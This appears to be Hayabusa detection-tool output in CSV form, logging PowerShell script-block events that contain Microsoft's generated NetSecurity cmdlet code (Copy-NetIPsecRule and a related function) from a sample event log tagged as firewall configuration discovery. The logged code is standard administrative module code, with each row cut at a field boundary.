[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickMod",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parame",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 